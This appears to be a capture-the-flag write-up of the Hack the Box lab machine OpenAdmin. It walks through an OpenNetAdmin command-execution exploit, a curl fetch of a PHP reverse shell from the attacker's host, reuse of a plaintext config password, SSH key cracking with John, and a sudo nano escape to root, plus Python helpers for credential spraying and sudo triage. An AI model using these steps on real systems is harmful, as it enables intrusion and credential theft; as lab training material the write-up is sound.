Hack the Box Writeup - OpenAdmin

Writeup for retired Hack the Box machine, OpenAdmin.


Work and home life have been crazy busy recently so I haven't had any opportunities to sit down and spend some time hacking away, but with the UK being on lockdown at the moment, I find myself with more spare time than usual. The silver lining is that I could dedicate some time to Hack the Box and owning a few more machines. This writeup is for the box "OpenAdmin".

Enumeration

Jumping straight into it, the first thing we do (as always) is run an nmap scan.

nmap -sC -sV -p- -oA allports 10.10.10.171

Not much to show from this, as the only open ports are SSH (22) and HTTP (80). Browsing to http://10.10.10.171 just shows us the default Apache page, so it's time to dig out some web enumeration tools.

First up I tried gobuster:

gobuster dir -u http://10.10.10.171 -r -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.171
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Follow Redir:   true
[+] Timeout:        10s
===============================================================
2020/03/22 12:14:15 Starting gobuster
===============================================================
/music (Status: 200)
/artwork (Status: 200)
/sierra (Status: 200)
/server-status (Status: 403)
===============================================================
2020/03/22 12:19:27 Finished
===============================================================

This turned up a few sub-sites, which I spent some time browsing and reviewing, but they revealed nothing of interest.

Strangely, running the same wordlist but using dirbuster finds us our way in! If someone can explain why Dirbuster finds this extra URL but Gobuster doesn't when using the exact same wordlist, then please let me know on Twitter @_deanwilliams.

The URL dirbuster finds is http://10.10.10.171/ona/, which gives us unauthenticated access to an installation of OpenNetAdmin.

Remote Command Execution

The page also handily shows the running version, v18.1.1, which a quick Google search reveals has a remote command execution vulnerability (found here).

Copying the bash script to our Kali machine and running it immediately gives us the ability to run commands through a reasonable facsimile of an interactive shell.

We are, however, a very low-privileged user (www-data) with no access to any of the other users' home directories, or to any flags. And whilst this looks like an interactive shell, it isn't: each command is sent as a separate web request and runs in a fresh process, so we can't change directories and so on. The first thing to do, then, is improve our access.

In order to do this, we copy php-reverse-shell.php to our working directory, edit the IP address and port so it points back at our listener, and then serve it with a Python HTTP server.

sudo python3 -m http.server 80

Now, using the RCE shell, we can run the following on the target to download our shell into the web root:

curl -o shell.php http://10.10.14.3/php-reverse-shell.php

Then start a netcat listener on the port you specified and browse to http://10.10.10.171/ona/shell.php; the shell connects back to the listener.

Further Enumeration

Now we can have a proper look around. A quick look at /etc/passwd shows us two normal user accounts, jimmy and joanna. That doesn't help us much at the moment, but if we find any passwords we can try them against those accounts.

Digging into the OpenNetAdmin files soon turns up a useful configuration file, /opt/ona/local/database_settings.inc.php, with the database password stored in plain text:

<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

?>

So let's try that password against the two user accounts we know of and attempt to ssh into the machine. We get a result with jimmy (the database password has been reused for a system account), but jimmy does not have a flag either, so now we need to find a way into joanna's account.
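The "harvest a password from a config file, then try it against every real account" step above is done by hand in the writeup. As an added example (my own code, not the author's or the OpenNetAdmin project's), here is a small Python helper that does the two halves of that step offline: it pulls the interactive accounts out of /etc/passwd (UID 1000 and above, plus root, with a real login shell) and any credential-looking keys out of a PHP config file, then pairs them into the SSH attempts worth making. The /etc/passwd sample is constructed to resemble the accounts mentioned in the writeup; the PHP sample is the database_settings.inc.php quoted above, trimmed to the relevant keys.

```python
import re

# Constructed sample of the relevant /etc/passwd entries (not a dump from the
# box); a real file carries many more service accounts, all of which we skip.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
"""

# The ONA database config quoted in the writeup, trimmed to the relevant keys.
SAMPLE_PHP_CONFIG = """\
<?php
$ona_contexts=array (
  'DEFAULT' =>
  array (
    'databases' =>
    array (
      0 =>
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
  ),
);
?>
"""

# Shells that mark an account as not intended for interactive login.
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def interactive_users(passwd_text, min_uid=1000):
    """Return account names with a real login shell and UID >= min_uid, plus root."""
    users = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:          # malformed line, ignore rather than crash
            continue
        name, _, uid, _, _, _, shell = fields
        if shell in NON_LOGIN_SHELLS:
            continue
        if name == "root" or int(uid) >= min_uid:
            users.append(name)
    return users


# Matches PHP array entries of the form  'db_passwd' => 'n1nj4W4rri0R!',
_PHP_KV = re.compile(r"""['"](\w+)['"]\s*=>\s*['"]([^'"]*)['"]""")
_CRED_KEY = re.compile(r"pass|pwd|secret|token|login|user", re.I)
_SECRET_KEY = re.compile(r"pass|pwd|secret|token", re.I)


def php_credentials(php_text):
    """Return (key, value) pairs from a PHP config whose key looks credential-related."""
    return [(k, v) for k, v in _PHP_KV.findall(php_text) if v and _CRED_KEY.search(k)]


def spray_candidates(passwd_text, php_text):
    """Pair every harvested secret with every interactive account and with the
    account the config itself names, in a stable order, for manual SSH attempts."""
    creds = php_credentials(php_text)
    passwords = sorted({v for k, v in creds if _SECRET_KEY.search(k)})
    config_users = sorted({v for k, v in creds if not _SECRET_KEY.search(k)})
    users = list(dict.fromkeys(interactive_users(passwd_text) + config_users))
    return [(u, p) for u in users for p in passwords]


if __name__ == "__main__":
    for user, password in spray_candidates(SAMPLE_PASSWD, SAMPLE_PHP_CONFIG):
        print(f"try: ssh {user}@10.10.10.171  (password: {password})")
```

The helper only builds the candidate list; the actual login attempts are still made by hand, which keeps the noise down on an engagement where lockout policies matter.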

When enumerating files earlier, we had spotted another directory under /var/www called internal, which www-data did not have permission to read - so let's start there, now that we are jimmy.

The directory contains three PHP files: index.php, main.php and logout.php. main.php contains something which looks very interesting:

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

If we can reach this page in a logged-in session, it will print out joanna's private SSH key. But how do we access it, given that it isn't served from the main site? Let's take a look at the Apache2 configuration.

The configuration tells us that the internal site is bound to localhost only, on port 52846, so it can't be reached from outside the box. It can, however, be reached from jimmy's SSH session, so we can make use of curl from there and take a look.

Cracking the Key

A quick copy and paste of that key into a file (joanna.key) and we can try to ssh into the machine as joanna, but that is soon scuppered: the key is encrypted and asks for a passphrase. John the Ripper to the rescue.

First, copy ssh2john.py (shipped with the jumbo build of John) to your working directory and run it to convert the key into a hash John can work on:

python ssh2john.py joanna.key > joanna.hash

Then run John the Ripper on the produced hash file using the rockyou wordlist:

/usr/sbin/john joanna.hash --wordlist=/usr/share/wordlists/rockyou.txt

... which finds the passphrase in short order! Older PEM-format keys (the ones with Proc-Type and DEK-Info headers) derive their encryption key from the passphrase with a single MD5 round, so wordlist attacks against them are fast; keys in the newer OpenSSH format with the bcrypt KDF take orders of magnitude longer to crack.

Now we can ssh into the machine as joanna and get that first flag. Restrict the key file's permissions to 0600 first, as ssh refuses to use a private key that other users can read.

ssh -i joanna.key joanna@10.10.10.171

Privilege Escalation

Now to get root, which turns out to be fairly straightforward. Checking what joanna is allowed to run with sudo shows that she can run nano on the file /opt/priv as root without a password, which we can abuse to get a privileged shell.

sudo /bin/nano /opt/priv

Then, once in nano, hit <CTRL>R (Read File) followed by <CTRL>X (Execute Command). When asked which command to execute, enter the following:

reset; sh 1>&0 2>&0

Which gives you an interactive root shell. The reset tidies up the terminal state nano leaves behind, and the redirections point sh's stdout and stderr at the terminal nano was reading from, so the shell is usable rather than silent.
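Before reaching for nano by hand, the check a practitioner wants is a quick triage of everything sudo -l reports: which rules run as root, which need no password, and which binaries are known to offer a shell escape. As an added example (my own code, not the author's or any tool from the writeup), here is a small Python parser for sudo -l output that does exactly that. The sample output is constructed to match the rule the writeup describes, with a second, harmless rule added for contrast; the escape list is a hand-picked subset of the binaries documented on GTFOBins as having sudo escapes.

```python
import re
from collections import namedtuple

# Constructed sample of `sudo -l` output, modelled on the rule the writeup
# describes (plus one harmless rule for contrast); not captured from the box.
SAMPLE_SUDO_L = """\
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
    (root) /bin/ls /var/log
"""

SudoRule = namedtuple("SudoRule", "runas nopasswd binary args")

# One rule line: "(runas) [TAG: ...] command [args][, command [args]...]"
_RULE = re.compile(
    r"^\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:(?:NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC):\s*)*)"
    r"(?P<cmds>.+)$"
)

# Binaries whose documented behaviour lets a sudo-restricted invocation spawn a
# shell or read/write arbitrary files (a subset of the GTFOBins sudo entries).
SHELL_ESCAPES = {
    "nano", "vim", "vi", "view", "less", "more", "man", "find", "awk", "perl",
    "python", "python3", "ruby", "bash", "sh", "env", "ed", "emacs", "ftp",
    "git", "tar", "zip", "socat", "nmap", "apt-get", "systemctl",
}


def parse_sudo_l(text):
    """Turn the rule section of `sudo -l` output into a list of SudoRule."""
    rules = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True            # everything after this header is a rule
            continue
        if not in_rules or not line:
            continue
        m = _RULE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        # sudo lists several commands on one line separated by ", "
        for cmd in m.group("cmds").split(", "):
            parts = cmd.split()
            if parts:
                rules.append(SudoRule(m.group("runas"), nopasswd, parts[0], parts[1:]))
    return rules


def runs_as_root(rule):
    """True when the runas user spec is root or ALL (the group part is ignored)."""
    return rule.runas.split(":")[0].strip() in ("ALL", "root")


def risky_rules(rules):
    """Rules that run a known shell-escape binary as root; NOPASSWD ones first."""
    hits = [r for r in rules if runs_as_root(r) and r.binary.rsplit("/", 1)[-1] in SHELL_ESCAPES]
    return sorted(hits, key=lambda r: not r.nopasswd)


if __name__ == "__main__":
    for r in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        tag = "NOPASSWD" if r.nopasswd else "password required"
        print(f"escape candidate: ({r.runas}) {r.binary} {' '.join(r.args)}  [{tag}]")
```

Restricting the arguments, as the /opt/priv rule does, is no protection here: nano's read-file and execute-command menus are available regardless of which file it was told to open, which is why the argument list is reported but not used to downgrade the finding.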

And there you have it. Quite a fun box overall. Onto the next one!